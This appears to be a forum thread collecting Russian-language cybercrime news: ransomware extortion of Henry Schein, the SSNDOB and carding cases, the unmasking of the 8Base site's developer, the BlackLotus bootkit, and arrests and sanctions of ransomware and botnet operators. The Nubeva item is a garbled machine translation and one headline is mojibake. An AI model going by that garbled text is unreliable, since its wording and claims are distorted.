Henry Schein, один из мировых лидеров в области распределения товаров и услуг для здравоохранения, столкнулся с трудностями в восстановлении бизнес-операций после атаки. 15 октября компания сообщила, что была вынуждена отключить некоторые системы для локализации кибератаки. Отключение систем привело к сбоям в работе производственных и распределительных отделов.
История событий разворачивается как настоящая сага: компания Henry Schein, по всей видимости, оказывается в невыгодном положении. ALPHV/BlackCat опубликовала на своем сайте длинное сообщение, в котором критикует Henry Schein за ряд проблем, включая стратегические ошибки, недостаточную коммуникацию и принятие сомнительных решений.
В сообщении группировка заявляет о «следующем уровне атаки» и разделяет его на три части: описание произошедшего, вопросы безопасности данных у Henry Schein и планы на будущее. Кроме того, группа предоставила своего рода «уроки», извлеченные из этих событий, для команды кибербезопасности и переговорщиков компании.
«Coveware, Stroz Friedberg, AVASEK, Proskauer, Clearly и другие поняли, что им не следует проявлять чрезмерную самоуверенность при работе с ALPHV. Их стратегии оказались пагубными, в результате чего уважаемая компания понесла за 2 месяца операционные убытки на общую сумму более $500 млн.», - заявили вымогатели.
К сообщению прилагаются образцы из 35 ТБ конфиденциальной информации, которую как утверждает BlackCat, группа извлекла из серверов Henry Schein. Данные включают конфиденциальные письма сотрудников, паспортные данные, личные данные клиентов и банковские счета поставщиков.
Группировка также опубликовала копию отчета компании Stroz Friedberg, который свидетельствует о возможности неограниченного доступа BlackCat к системам компании.
Первая атака была раскрыта 15 октября, когда компания отключила некоторые системы для предотвращения дальнейшего распространения вредоносного ПО. 13 ноября компания подтвердила, что злоумышленники получили доступ к такой конфиденциальной информации, как реквизиты банковских счетов и данные кредитных карт. Скорее всего утечке подверглись и другие ценные сведения. 22 ноября компания сообщила, что некоторые из её приложений и электронная коммерческая платформа снова были отключены в результате новой атаки, за которую также ответственна группа BlackCat.
Виталий Чичасов был администратором маркетплейса SSNDOB, сгенерировавшего свыше 19 миллионов долларов прибыли.
Украинец Виталий Чичасов, находящийся в данный момент на территории США, признал себя виновным в сговоре по совершению мошенничества с использованием устройств доступа и торговле несанкционированными устройствами доступа через специальную закрытую площадку.
Чичасов был администратором SSNDOB Marketplace, серии сайтов, которые продавали личную информацию американских граждан, включая их полные имена, даты рождения и номера социального страхования.
Операция правоохранительных органов привела к изъятию доменов маркетплейса 7 июня 2022 года. За время своей работы SSNDOB успел продать данные 24 миллионов человек, получив прибыль от продаж более 19 миллионов долларов.
«Украденные номера социального страхования могут быть использованы для совершения различных видов мошенничества, включая налоговое мошенничество, мошенничество с пособием по безработице, мошенничество с кредитами, кредитными картами и т.д.», — говорится в заявлении Министерства юстиций США (DOJ).
Чичасов был арестован в марте 2022 года, когда пытался въехать в Венгрию, и затем был экстрадирован в США в июле того же года. Вместе с признанием вины он также согласился передать домены «blackjob.biz», «ssndob.club» и «ssndob.vip», которые использовались для совершения преступлений. Второй администратор SSNDOB, Сергей Пугач, также был арестован в мае 2022 года.
Власти США опознали двух администраторов благодаря расследованию, проведённому киберпреступной службой IRS и ФБР при поддержке Министерства юстиции США, а также властей Латвии и Кипра.
Из судебных документов следует, что администраторы рекламировали SSNDOB через объявления, которые они создавали на различных сайтах в тёмной сети (других тёмных маркетплейсах и хакерских форумах).
Чтобы не дать возможности властям опознать себя, администраторы принимали оплату только в трудноотслеживаемой криптовалюте и размещали серверы для сайта в стратегически выбранных местах по всему миру.
Чичасову теперь грозит максимальное наказание в виде лишения свободы сроком до 15 лет и конфискация денежных средств в размере 5 миллионов долларов, которые, по предварительным данным, являются преступным доходом.
source: justice[.]gov/usao-mdfl/pr/ssndob-marketplace-administrator-pleads- guilty-charges-related-his-operation-series

Reversal Technology ](https://www.msspalert.com/news/nubeva-a-custom- decryption-specialist-looks-to-patent-its-ransomware-reversal-technology)
Nubeva claims that it can build a custom decryptor within an hour after an organization ‘s systems are grabbed by a cyberattacker.
www.msspalert.com
Что за фигня?
nubeva.com, специалист по индивидуальному расшифрованию, ищет патент на свою технологию реверса вымогателей.
По словам представителей компании, Nubeva, специалист по расшифровке кибербезопасности, подал заявку на патент в США, чтобы ускорить доставку своей индивидуальной расшифровки технологии для жертв, разграбленных Ransomware.
Рассказы на вымогателях - это линчпин, которую кибер -вымогатели держат фигуративные руководители своих жертв, угрожая, что если компания удерживает выплаты выкупа, их данные останутся навсегда заблокированными, разрушенными или иногда хуже, публично опубликованы.
По данным Сан-Хосе, штат Калифорния Nubeva, ее разборка вымогателей, способствующего искусственному интеллекту (ИИ), настраивает децифтаторы, настраивает децирипторы для клиентов, пострадавшие от новых вариантов вымогателей. Это помогает сократить время восстановления для организаций, пораженных требованиями выкупа.
Строительство дешиптора в течение часа
Nubeva сказал, что он может построить пользовательский дешиптор в течение часа после того, как системы организации захвачены кибератакером. Программное обеспечение Nubeva Ransomware Rensversal доступно для предприятий конечных пользователей, поставщиков управляемых услуг безопасности, респондентов инцидентов и производителей решений для кибербезопасности.
Облачная технология Nubeva использует частный, криптографически обученный двигатель ИИ для анализа зашифрованных образцов данных с использованием захваченных клавиш для определения соответствующих методов и механизмов дешифрования. Затем технология может написать программное обеспечение для расшифровки, тестовые наборы и документацию, чтобы повысить эффективность создания декипторов для новых вариантов вымогателей.
Компания, которая рассчитывает начать производство своих технологий в конце этого года, стремится обеспечить более быстрое восстановление решений для затронутых организаций.
Стив Перкинс, директор по маркетингу Nubeva, объяснил, как «основная ценность компании» помогает систему Get Systems в онлайн:
«Мы специализируемся на расшифровке вымогателей путем захвата ключей шифрования, что является самой сложной частью процесса и чего -то, что мы освоили. С этими ключами наша экспертная команда сборщиков дешипторов, и мы продолжаем добавлять в нашу растущую библиотеку. Но наше видение всегда заключалось в том, что, когда клиент попадает в новый вариант, мы строим и доставляем пользовательский дешиптор в течение часа. Используя ИИ, мы усиливаем процесс, который мы уже освоили, ускоряя создание важных децирипторов. Это инновация обеспечивает дальнейшую уверенность для наших клиентов и сокращает время и опыт, требуемые, поскольку актеры угроз продолжают развиваться ».
Больше нет выкупа?
Сборник Nubeva для ее технологий заключается в том, что он устраняет необходимость платить выкуп.
По словам чиновников, обеспечение быстрого и надежного восстановления данных помогает организациям минимизировать операционные сбои, потери данных и связанные с ними финансовые и другие убытки и обеспечивает новый уровень устойчивости к бизнесу против выкуп.
В прошлом месяце, в третьей стороне, проведенной Миси, технология реверсии вымогателей Nubeva достигла 100% успеха, проходя все семнадцать предписанных тестов без каких-либо сбоев. Он продемонстрировал 100% -ную скорость захвата ключа из разнообразного диапазона конкретных высокопрофильных штаммов вымогателей, протестированных, включая Lockbit, Ragnar Locker и Blackbasta. Кроме того, оценки безопасности не обнаружили, что наблюдаемые уязвимости или ненужные сетевые порты не открыты.
by google translate.
Используя информацию, случайно попавшую в паблик, известный блогер и исследователь Брайан Кребс (Brian Krebs) сумел определить, что часть кода сайта, созданного операторами шифровальщика, написал 36-летний программист, проживающий в Кишиневе.
Кибергруппа, стоящая за 8Base, использует схему двойного вымогательства, требуя выкуп за расшифровку данных и угрожая неплательщикам раскрытием факта взлома. Ее сайт, предназначенный для таких публикаций, доступен через Tor.
Встроенный чат для ведения переговоров использует PHP-фреймворк Laravel и, по свидетельству Кребса, исправно работает при отправке данных на сервер (через POST). Запросы GET до недавнего времени возвращали пространное сообщение об ошибке, раскрывавшее IP-адрес хоста (95.216.51[.]74 в Финляндии), спрятанного с помощью сервисов Tor.
Прокруткой страницы можно было обнаружить ссылку на Gitlab-сервер, выделенный на нужды компании JCube Group. Как оказалось, привязанный репозиторий содержит и другие PHP-коды, используемые сайтом 8Base.

Дальнейшие раскопки показали, что Gitlab-аккаунт JCube Group создал разработчик Андрей Колев, проживающий в столице Молдавии. Так, по крайней мере, значится в его профиле на LinkedIn. Там также указана специализация: разработка веб-приложений полного цикла (на стороне клиента и сервера); место работы — JCube Group, адрес и телефон совпадают с контактами, опубликованными на сайте компании.
Все «иксы» Колева (твиты по-старому) написаны на русском языке. Кребс запросил у него комментарий, однако собеседник сказал, что не знает, почему даркнет- сайт 8Base загружает код из папки Clients в его хранилище.
Тем не менее предательское сообщение об ошибке на сайте 8Base очень быстро убрали. Вместо него теперь выводится ошибка 405 — «метод HTTP не разрешен». Автор находки, благодаря которой Кребс начал очередное расследование, почти уверен: деанонимизация произошла оттого, что создатель onion-сайта неумышленно оставил режим разработки (забыл отключить средства отладки и тестирования).
[](https://www.anti- malware.ru/files/image28base_site_creator.png)
source: krebsonsecurity[.]com/2023/09/whos-behind-the-8base-ransomware-website
Каковы результаты такой проверки?
В ночь с 4 на 5 июля были проведены учения, в рамках которых организаторы решили выключить международный сегмент интернета. Результаты учений пока не разглашаются, но представитель Роскомнадзора заявил, что учения прошли успешно.
Это означает, что российские операторы связи переставали передавать трафик через трансграничные каналы связи и использовали только внутренние точки обмена трафиком. Таким образом, пользователи Рунета не могли получать доступ к сайтам и сервисам, расположенным за пределами России.
Однако, остался нераскрытым вопрос о целях, преследуемых организаторами учений. Представители ведущих телекоммуникационных компаний страны отказались комментировать событие.
Один из экспертов телекоммуникационного рынка сравнил проведение учений с испытаниями бронежилетов. По его мнению, такие проверки позволяют убедиться в работоспособности системы в условиях экстремальных ситуаций.
Закон «О суверенном Рунете», принятый в 2019 году, ставит своей целью защиту российского интернета от внешних угроз. Установка специального оборудования на сетях всех операторов страны позволяет Роскомнадзору контролировать маршрутизацию трафика при необходимости. Хотя случаев отключения России от глобального интернета не было зафиксировано, служба продолжает применять установленное оборудование для блокировки запрещенного контента и регулирования работы определенных платформ.
Учения по выключению международного интернета позволяют России оценить уровень своей независимости в виртуальном мире и проверить работоспособность Рунета в условиях экстремальных ситуаций.
source: rbc.ru/technology_and_media/05/07/2023/64a569439a7947106d06262b?from=from_main_1
Article: https://home.treasury.gov/news/press-releases/jy1256
Vitaly Kovalev | Bentley,Ben Maksim Mikhailov | Baget Valentin Karyagin | Globus Mikhail Iskritskiy | Tropa Dmitry Pleshevskiy | Iseldor Ivan Vakhromeyev | Mushroom Valery Sedletski | Strix
Maksim Mikhailov has been involved in development activity for the Trickbot Group. Maksim Mikhailov is also known as the online moniker “Baget”.
Valentin Karyagin has been involved in the development of ransomware and other malware projects. Valentin Karyagin is also known as the online moniker “Globus”.
Mikhail Iskritskiy has worked on money-laundering and fraud projects for the Trickbot Group. Mikhail Iskritskiy is also known as the online moniker “Tropa”.
Dmitry Pleshevskiy worked on injecting malicious code into websites to steal victims’ credentials. Dmitry Pleshevskiy is also known as the online moniker “Iseldor”.
Ivan Vakhromeyev has worked for the Trickbot Group as a manager. Ivan Vakhromeyev is also known as the online moniker “Mushroom”.
Valery Sedletski has worked as an administrator for the Trickbot Group, including managing servers. Valery Sedletski is also known as the online moniker “Strix”.
ÐвÑÐ¾Ð¿Ñ Ð² ближайÑие 48 ÑаÑов. Ðни анонÑиÑÑÑÑ ÑилÑнейÑÑÑ ÐºÐ¸Ð±ÐµÑаÑÐ°ÐºÑ Ð² иÑÑоÑии ](https://lenta.ru/news/2023/06/14/killnet/)
Сразу несколько хакерских группировок планируют провести масштабную атаку на европейскую банковскую систему. Как стало известно «Ленте.ру», свои усилия для достижения этой цели объединили хактивисты Killnet, представители считавшейся разгромленной Revil, а также члены Anonymous Sudan.
lenta.ru
Будет интересно, если получится
Среди многих типов вредоносных кодов программы-вымогатели представляют серьезную угрозу. Программы-вымогатели шифруют данные и требуют выкуп в обмен на расшифровку. Поскольку восстановление данных невозможно, если ключ шифрования не получен, некоторые компании несут значительный ущерб, например, выплату огромных сумм денег или потерю важных данных. В этой статье мы проанализировали программу-вымогатель Hive, появившуюся в июне 2021 года. Программа-вымогатель Hive причинила огромный вред, что заставило ФБР выпустить предупреждение об этом. Чтобы свести к минимуму ущерб, причиняемый Hive Ransomware, и помочь жертвам восстановить свои файлы, мы проанализировали Hive Ransomware и изучили методы восстановления. Проанализировав процесс шифрования программы-вымогателя Hive, мы подтвердили наличие уязвимостей, связанных с использованием их собственного алгоритма шифрования. Мы восстановили мастер- ключ для частичной генерации ключа шифрования файла, чтобы можно было расшифровать данные, зашифрованные программой-вымогателем Hive. Мы восстановили 95% мастер-ключа без закрытого ключа RSA злоумышленника и расшифровали фактические зараженные данные. Насколько нам известно, это первая успешная попытка расшифровки программы-вымогателя Hive. Ожидается, что наш метод можно использовать для уменьшения ущерба, причиняемого программами- вымогателями Hive.
[2202.08477] A Method for Decrypting Data Infected with Hive Ransomware
И сам разбор полетов
Базирующаяся в Швеции компания Mullvad, создавшая одноименный VPN-сервис, сообщила, что 18 апреля в офис компании пришла шведская полиция с ордером на обыск. Сотрудники планировали конфисковать компьютеры с персональными данными клиентов VPN-сервиса.
Сотрудники Mullvad, следует из сообщения, уведомили полицию, что не хранят данные своих клиентов, а значит конфискация компьютеров будет считаться нарушением шведского законодательства. Проконсультировавшись с прокурором, сотрудники полиции покинули офис Mullvad. Других подробностей не приводится.
PG Magazine пишет, что полиция, вероятно, собирала улики в рамках уголовного расследования в отношении хакеров. Издание отмечает, что хакеры часто используют VPN-сервисы, чтобы скрыть свои киберпреступления.
Mullvad — платный VPN-сервис, который придерживается строгой политики конфиденциальности клиентов, следует из информации на его сайте. В частности, он не просит регистрации пользователя при подключении.
Cайт по обзору продуктов Wirecutter (проект The New York Times) в марте назвал Mullvad лучшим VPN-сервисом по критерию безопасности и уровню конфиденциальности данных.
На минувшей неделе наблюдались перебои в работе Mullvad из России. В техподдержке сервиса заявили, что от сбоев в основном пострадали российские пользователи мобильных приложений сервиса. Часть сервисов Mullvad при этом все еще работает, к ним можно подключиться.
source: mullvad.net/ru/blog/2023/4/20/mullvad-vpn-was-subject-to-a-search- warrant-customer-data-not-compromised/
Скрытый буткит под названием BlackLotus стал первым широко известным вредоносным ПО, способным обходить защиту Secure Boot в UEFI, что делает его серьезной угрозой в киберпространстве.
«Этот буткит может работать даже на полностью обновленных системах Windows 11 с включенной безопасной загрузкой UEFI», — говорится в [отчёте](https://www.welivesecurity.com/2023/03/01/blacklotus-uefi-bootkit- myth-confirmed/) компании ESET.
UEFI-буткиты развёртываются в прошивке материнской платы и обеспечивают полный контроль над процессом загрузки операционной системы, что позволяет отключать механизмы безопасности на уровне ОС и развертывать произвольные полезные нагрузки с высокими привилегиями во время запуска системы.
Подробности о BlackLotus впервые появились в октябре 2022 года, когда исследователь «Лаборатории Касперского» Сергей Ложкин [описал](https://usa.kaspersky.com/about/press-releases/2022_kaspersky- uncovers-third-known-firmware-bootkit) его как «сложное криминальное ПО».
В двух словах, BlackLotus использует уязвимость CVE-2022-21894 (она же Baton Drop), чтобы обойти защиту UEFI Secure Boot и настроить своё постоянство в компьютере жертвы. Microsoft устранила эту уязвимость ещё в январе прошлого года, но из-за того, что не все следят за актуальностью своего программного обеспечения, миллионы компьютеров всё ещё уязвимы перед BlackLotus.
По данным ESET, успешная эксплуатация уязвимости позволяет выполнять произвольный код на ранних этапах загрузки компьютера, позволяя злоумышленнику реализовывать вредоносные действия в системе с включенной UEFI Secure Boot без физического доступа к ней.
«Это первое публично известное использование этой уязвимости», — сказал Мартин Смолар, исследователь компании ESET.
Точный способ развертывания буткита пока неизвестен, но он начинается с компонента установщика, который отвечает за запись файлов в системный раздел EFI, отключение HVCI и BitLocker, а затем перезагрузку хоста. После перезагрузки следует установка самого буткита, и далее он автоматически выполняется при каждом запуске системы для развертывания драйвера ядра.
«За последние несколько лет было обнаружено множество критических уязвимостей, влияющих на безопасность систем UEFI. К сожалению, из-за сложности всей экосистемы UEFI и проблем с цепочками поставок обновлений многие из этих уязвимостей остаются актуальными даже спустя долгое время после исправления», — подытожил специалист ESET.
Офис “Сбербанка” настоятельно просят удалить Telegram с рабочих компьютеров. Следить за исполнением поручения будет Служба Безопасности.
О том, что HR-отдел разослал сотрудникам “Сбербанка” приказ избавиться от “телеги” изданию Baza сообщил источник в компании. До этого работникам намекали на необходимость удалить мессенджер, теперь просьба переросла в требование.
По словам инсайдера, сотрудники хранили в Telegram рабочие чаты. Руководство стремится “пересадить” их на корпоративный “СберЧат”, но офис делает это неохотно.
“СберЧат” запустили 3 года назад на базе платформы dialog (входит в экосистему Сбербанка).
Компания “Диалог имеет лицензии ФСТЭК и ФСБ, а также зарегистрирована в
реестре Минкомсвязи как издатель отечественного ПО, говорится на сайте
Сбербанка.
По информации Baza, следить за выполнением приказа удалить Telegram с
компьютеров будет Служба Безопасности Сбербанка.
Сегодня же Герман Греф выступил на форуме “Знание”. Как сообщает официальный Telegram-канал Сбербанка, председатель правления выделил семь ключевых технологий будущего: искусственный интеллект (ИИ); высокоскоростной интернет (5G/6G); облачные вычисления; web 3.0; виртуальная и дополненная реальность (AR/VR); квантовые вычисления и биотехнологии.
Программа Государственного департамента США "Награды за правосудие" (RFJ), администрируемая Службой дипломатической безопасности, предлагает вознаграждение в размере до 10 миллионов долларов за информацию, позволяющую идентифицировать или установить местонахождение любого лица, которое, действуя по указанию или под контролем иностранного правительства, участвует в вредоносных кибератаках против критически важной инфраструктуры США в нарушение Закона о компьютерном мошенничестве и злоупотреблениях (CFAA).
Соразмерно серьезности, с которой мы относимся к этим киберугрозам, программа Rewards for Justice создала канал информирования о подсказках в Tor для защиты потенциальных источников. Программа RFJ также работает с межведомственными партнерами, чтобы обеспечить быструю обработку информации, а также возможное перемещение и выплату вознаграждений источникам. Выплаты вознаграждения могут включать платежи в криптовалюте.
Более подробная информация об этом предложении вознаграждения размещена на веб-сайте Rewards for Justice по адресу www.rewardsforjustice.net
Оригинал: https://twitter[.]com/RFJ_USA .
За Ryuk вступился участник группировки REvil, использующий псевдоним Unknown.
Пользователь одного из форумов в даркнете, использующий псевдоним Сигна, предъявил претензию киберпреступной группировке Ryuk на сумму в $2 млн за нарушение договоренностей между киберпреступниками. Об этом сообщил телеграм- канал Russia OSINT.
«Господин Д и R нарушили все пункты наших договоренностей, влезали в процесс переписки, писали на неграмотном английском языке и в конце отшили меня, и Аутсорс-Компанию мотивируя тем, что они на полпути после всех наших трудов не заинтересованы в наших услугах. В результате была проделана колоссальная работа по неоднократному инсайду, неоднократному внешнему давлению на руководство Школы и.т.д. Было впустую потрачено мое время и что самое главное время, труд и деньги Аутсорс-Компании», — сообщил Сигна.
К разговору между пользователями вскоре присоединился арбитр форума, а также участник группировки REvil, использующий псевдоним Unknown.
«Арбитр, если необходимо, готовы поучаствовать в изучении фактов и всей подноготной этого «рынка» с мотивированным описанием какого-либо процесса, нашего субъективного взгляда и как происходит на практике», — отметил Unknown.
Представитель группировки REvil объяснил, что Сигна в преступной схеме сыграл небольшую роль, однако хочет присвоить себе все заслуги. Ryuk, в свою очередь, взяли часть выкупа в разы меньшую, чем хотел Сигна. Unknown попросил Сигну выплатить компенсацию за срыв выкупа в размере $7 млн.
Europol announces disruption of Emotet botnet. Internal servers were seized and sinkholed. After the TrickBot disruption last year, everyone's holding their breadth today to see if this will last or just be a simple bump in the road
Law enforcement and judicial authorities worldwide have this week disrupted one of most significant botnets of the past decade: EMOTET. Investigators have now taken control of its infrastructure in an international coordinated action. This operation is the result of a collaborative effort...
www.europol.europa.eu
Ukrainian police announce the arrest of two suspects who were allegedly tasked with keeping Emotet infrastructure up and running:
розповсюдженні найнебезпечнішого в світі комп’ютерного вірусу «EMOTET» — Департамент Кіберполіції ](https://www.cyberpolice.gov.ua/news/kiberpolicziya- vykryla-transnaczionalne-ugrupovannya-xakeriv-u-rozpovsyudzhenni- najnebezpechnishogo-v-sviti-kompyuternogo-virusu-emotet-2504/)
Департамент Кіберполіції Національної поліції України
www.cyberpolice.gov.ua
Full Story: [https://www.europol.europa.eu/newsr...alware-emotet-disrupted-
through-global-
action](https://www.europol.europa.eu/newsroom/news/world%E2%80%99s-most-
dangerous-malware-emotet-disrupted-through-global-action)
Here's a video from their arrest as well:
Сотрудники МВД России при поддержке специалистов компании F.A.С.С.T., российского разработчика технологий для борьбы с киберпреступлениями, вычислили и задержали участников преступной группы вымогателей SugarLocker. Работали злоумышленники под вывеской легальной IT-фирмы, предлагающей услуги по разработке лендингов, мобильных приложений и интернет-магазинов.
По данным следствия, программа-вымогатель SugarLocker (aka Encoded01) появилась еще в начале 2021 года, но в первое время активно не использовалась. В ноябре того же года на андеграундном форуме RАMР от участника под ником “gustavedore” было опубликовано объявление о запуске партнерской программы по модели RaaS (от англ. Ransomware-as-a-Service, «программа-вымогатель как услуга») и наборе партнёров в группу вымогателей, использовавших шифровальщик SugarLocker. Суть модели RaaS в том, что разработчики продают или сдают в аренду вредоносное ПО своим партнерам для дальнейшего взлома сети и развертывания программ-вымогателей.
В объявлении говорилось, что хакерская группировка атакует цели через сети и RDP — протокол удаленного рабочего стола, не работает по странам СНГ и готова незамедлительно начать работу с партнерами на условиях: 70% от выручки получает партнер, а 30% — SugarLocker. В случае, если доход превысит $5 млн, прибыль будет распределена на более выгодных условиях: 90% на 10%, соответственно.
Финальная гравюра GustaveDore
В начале января 2022 года эксперты F.A.C.C.T. установили, что некоторые элементы инфраструктуры SugarLocker располагались на российских хостингах. Из- за того, что злоумышленники допустили ошибку в конфигурации веб-сервера, удалось обнаружить SugarPanel — панель управления программой-вымогателем.
В ходе расследования были установлено несколько фигурантов, которые не только занимались продвижением своего шифровальщика, но и разрабатывали вредоносное программное обеспечение на заказ, создавали фишинговые сайты интернет- магазинов, нагоняли трафик пользователей на популярные в России и СНГ мошеннические схемы.
Любопытно, что работали злоумышленники под вывеской легальной IT-фирмы Shtazi- IT, предлагающей услуги по разработке лендингов, мобильных приложений, скриптов, парсеров и интернет-магазинов. Компания открыто размещала объявления о найме новых сотрудников — разработчиков, в контактах был указан Telegram- аккаунт все того же GustaveDore. Всю собранную информацию эксперты F.A.C.C.T. передали в полицию — БСТМ МВД России.
В январе 2024 года трое членов группы SugarLocker были задержаны сотрудниками БСТМ МВД России при участии специалистов компании F.A.C.C.T. В ходе обыска у подозреваемых были обнаружены ноутбуки, мобильные телефоны, следы переписки, прочие цифровые улики, подтверждающие их противоправную деятельность. Так, например, после появления в публичном доступе информации об исследованиях нового семейства шифровальщиков SugarLocker, один из фигурантов поделился с соучастниками шуткой “Парни, я в Сибирь, мне точно надо“. И она оказалась пророческой. Среди задержанных оказался и обладатель ник-неймов blade_runner, GistaveDore, GustaveDore, JimJones.
Фигурантам уже предъявлены обвинения по статье 273 УК РФ “Создание, использование и распространение вредоносных компьютерных программ”. Ведётся следствие.
• Source: [https://www.facct.ru/media-center/p...aign=sugarlocker- ransomware&utm_medium=social](https://www.facct.ru/media-center/press- releases/sugarlocker-ransomware/?utm_source=telegram&utm_campaign=sugarlocker- ransomware&utm_medium=social)
Мы разрушаем очень болезненный шаблон, что в **нашей стране предпринимателем может быть не каждый. Нет!**Каждый.
Click to expand...
Стали известны подробности уголовного преследования блогера Аяза Шабутдинова, подозреваемого в особо крупном мошенничестве. Молодой человек, доходы которого оказались существенно выше, чем у находящейся под следствием коллеги Елены Блиновской, под видом образовательной деятельности продавал якобы уникальные методики по развитию любого бизнеса. Их стоимость доходила до 1 млн руб. Суть же уроков, как утверждают потерпевшие, сводилась фактически к тому, что «надо верить в себя — и все получится». Пока заявления на блогера, имеющего в соцсетях около 2 млн подписчиков, написали восемь учеников, отдавших ему 5 млн руб.
32-летнего бизнес-коуча Аяза Шабутдинова оперативники столичного УФСБ и ГУЭБиПК МВД России задержали в пятницу утром в арендуемой им московской квартире. Ночью он прилетел из Вены и даже не успел распаковать чемоданы.
По данным «Ъ», уголовное дело об особо крупном мошенничестве (ч. 4 ст. 159 УК РФ) в отношении блогера было возбуждено УВД по Центральному округу Москвы.
Основанием стали обращения пяти предпринимателей, заплативших Аязу Шабутдинову в общей сложности 5 млн руб., по сути, за совет верить в себя.
Впрочем, сразу же разыскать и допросить автора тренингов не удалось: он путешествовал по Европе.
Широкому кругу начинающих предпринимателей Аяз Шабутдинов известен как основатель «Лайк центра» — компании для образования бизнесменов. Суть предоставляемых бизнес-коучем слушателям услуг сводится к платным тренингам и курсам, где он рассказывает о том, как каждый может заработать.
По версии же следствия, якобы уникальная методика по развитию любого бизнеса, которую сам автор выдавал за образовательную программу, по сути, сводилась к призыву «верьте в себя — и все получится».
На страничке своего сайта Аяз Шабутдинов под девизом «Бизнес — это не сложно» рассказывает о том, что в 21 год он основал компанию Coffee Like, которую через пять лет (см. «Ъ» от 27 ноября 2018 года) продал за 200 млн руб. На вырученные деньги им и был образован холдинг Like, принесший ему миллиардное состояние. Самый популярный проект называется «Концентрат».
Как следует из показаний потерпевших, чтобы получить доступ к курсу, необходимо было внести относительно небольшую сумму. Однако первый урок оказывался, по сути, самопиаром Аяза Шабутдинова. А за дальнейшее обучение тому, как организовать и вести бизнес-процессы, надо было платить уже немалые деньги. По некоторым данным, стоимость таких курсов могла доходить до 1 млн руб. При этом далеко не все бизнесмены могли позволить себе заплатить такие суммы сразу. Таким охотно приходили на помощь помощники блогера, арендовавшего офис в башне «Федерация» в «Москва-Сити». Там желавшим прослушать полный цикл лекций Аяза Шабутдинова сообщали, что заплатить можно в рассрочку или воспользоваться специальной кредитной программой.
Однако как полагают следователи, блогер вводил слушателей в заблуждение, под видом образовательных услуг рассказывая им, по сути, историю своего успеха в бизнесе.
Пока с заявлениями в правоохранительные органы обратились восемь потерпевших, отдавших блогеру 5 млн руб. Впрочем, следствие не исключает, что количество пострадавших от действий предполагаемого мошенника может составить не одну сотню человек. По окончании допроса будет решаться вопрос с избранием Аязу Шабутдинову меры пресечения. По данным «Ъ», сегодня он, вероятнее всего, будет задержан на двое суток и помещен в изолятор временного содержания, а впоследствии Таганский суд в зависимости от ходатайства следствия отправит его в СИЗО или под домашний арест.
Представители Аяза Шабутдинова утверждают, что в отношении него самого и компании Like только «проводятся проверка» и «опрос свидетелей».
По их версии, поводом стало заявление клиентки, несогласной с условиями возврата денег, предусмотренного договором. Утверждается, что компания «в полном объеме выполнила все взятые на себя обязательства». При этом в комментарии говорится, что заявительницу участники программы знают как эмоционально нестабильного и конфликтного человека. В компании Like утверждают, что компания работает в штатном режиме и все ее мероприятия идут по расписанию. В свою очередь, официальный представитель МВД Ирина Волк отметила, что в деле «имеется информация о нескольких эпизодах противоправной деятельности» фигуранта.
Специалисты АНБ считают, что небезопасные языки программирования открывают
слишком много уязвимостей для киберпреступников.
В последнем отчете Агентства национальной безопасности (АНБ США) говорится о
том, что злоумышленники все чаще и чаще начинают использовать уязвимости,
связанные с управлением памятью, так как что C и C++ не обеспечивают должный
уровень безопасности при работе с ней. Согласно документу, с помощью этих
брешей в защите хакерам удается с легкостью получать доступ к конфиденциальной
информации, выполнять произвольный код и нарушать цепочки поставок ПО.
В пресс-релизе также были приведены слова технического директора агентства по
кибербезопасности, который отметил, что уязвимости, возникающие из-за
небезопасной работы с памятью эксплуатируются уже несколько десятилетий и все
еще слишком распространены.
Основой таких заявлений стала статистика Google и Microsoft: порядка 70 % всех
уязвимостей в продуктах IT-гигантов связаны с безопасностью оперативной
памяти. Поэтому АНБ рекомендует организациям начать переходить на безопасные
языки программирования, такие как C#, Go, Java, Ruby, Rust и Swift.
Эксперты агентства считают, что использование вышеперечисленных языков поможет
предотвратить возникновение определенных типов уязвимостей, связанных с
памятью. Кроме того, в отчете рекомендуется использовать доступные средства
защиты кода: параметры компилятора, анализ инструментов и конфигурации ОС.
Завершено расследование уголовного дела в отношении кардера, который 14 лет скрывался от преследования по всему миру. Об этом БЕЛТА сообщили в отделе информации и связи с общественностью Следственного комитета.
Как установлено, минчанин Владимир Кадария в 2008 году реализовал преступную схему по хищению денежных средств со счетов иностранцев и юрлиц путем модификации компьютерной информации. Злоумышленник приобретал реквизиты и информацию с магнитных полос банковских карт в даркнете, затем записывал их на белый пластик для имитации банковской платежной карты, обналичивал похищенные денежные средства через банкоматы Минска, а также выводил деньги через банковские счета дропов, в их числе были и граждане Беларуси. После того как личность киберпреступника была установлена, его признали подозреваемым по уголовному делу, но Кадария покинул Беларусь и стал скрываться от преследования. В 2009 году его объявили в розыск.
Злоумышленник на протяжении 14 лет скрывался в разных странах, а в 2016 году даже обращался в миграционную службу Украины с ходатайством о признании его беженцем или лицом, нуждающимся в дополнительной защите.
В рамках расследования уголовного дела СК Беларуси наладил международное взаимодействие с рядом стран Европы, СНГ и Интерполом. Среди стран, из которых злоумышленник похитил денежные средства, - США, Польша, Франция, Великобритания. Общая сумма похищенного составила более 35 млн неденоминированных рублей, а сумма, прошедшая через так называемых дропов в качестве преступного дохода, превысила $225 тыс.
В 2022 году была получена оперативная информация, что злоумышленник некоторое время проживал на территории Испании. В августе прошлого года Кадария прилетел в Кыргызстан, где и было принято решение о его задержании. По предоставленным следствием материалам Генпрокуратура Беларуси направила документы с запросом на экстрадицию обвиняемого. В марте этого года кардер передан в Беларусь для привлечения его к уголовной ответственности.
Следователи главного следственного управления провели весь необходимый комплекс следственных действий, собрали достаточные доказательства, подтверждающие причастность минчанина к совершенному преступлению. Мужчина находится под стражей. Злоумышленнику предъявлено обвинение по ч.4 ст.212 (хищение денежных средств путем модификации компьютерной информации) УК. Мужчина вину в совершении преступления признал в полном объеме.
Кадария рассказал следователям о якобы политических мотивах его экстрадиции, которые тиражировались экстремистскими ресурсами. Следственный комитет предоставил видео допроса злоумышленника. "Это полный бред. Я никогда не участвовал ни в каких политических движениях, ничего не администрировал. С политикой никогда не был связан, - сказал на видео киберпреступник. - Не знаю, кто и для чего такие статьи разместил. Не имею никакого отношения к этому. Вы сами знаете, почему я отсюда убежал (из Беларуси. - Прим. БЕЛТА) и какую статью мне инкриминируют".
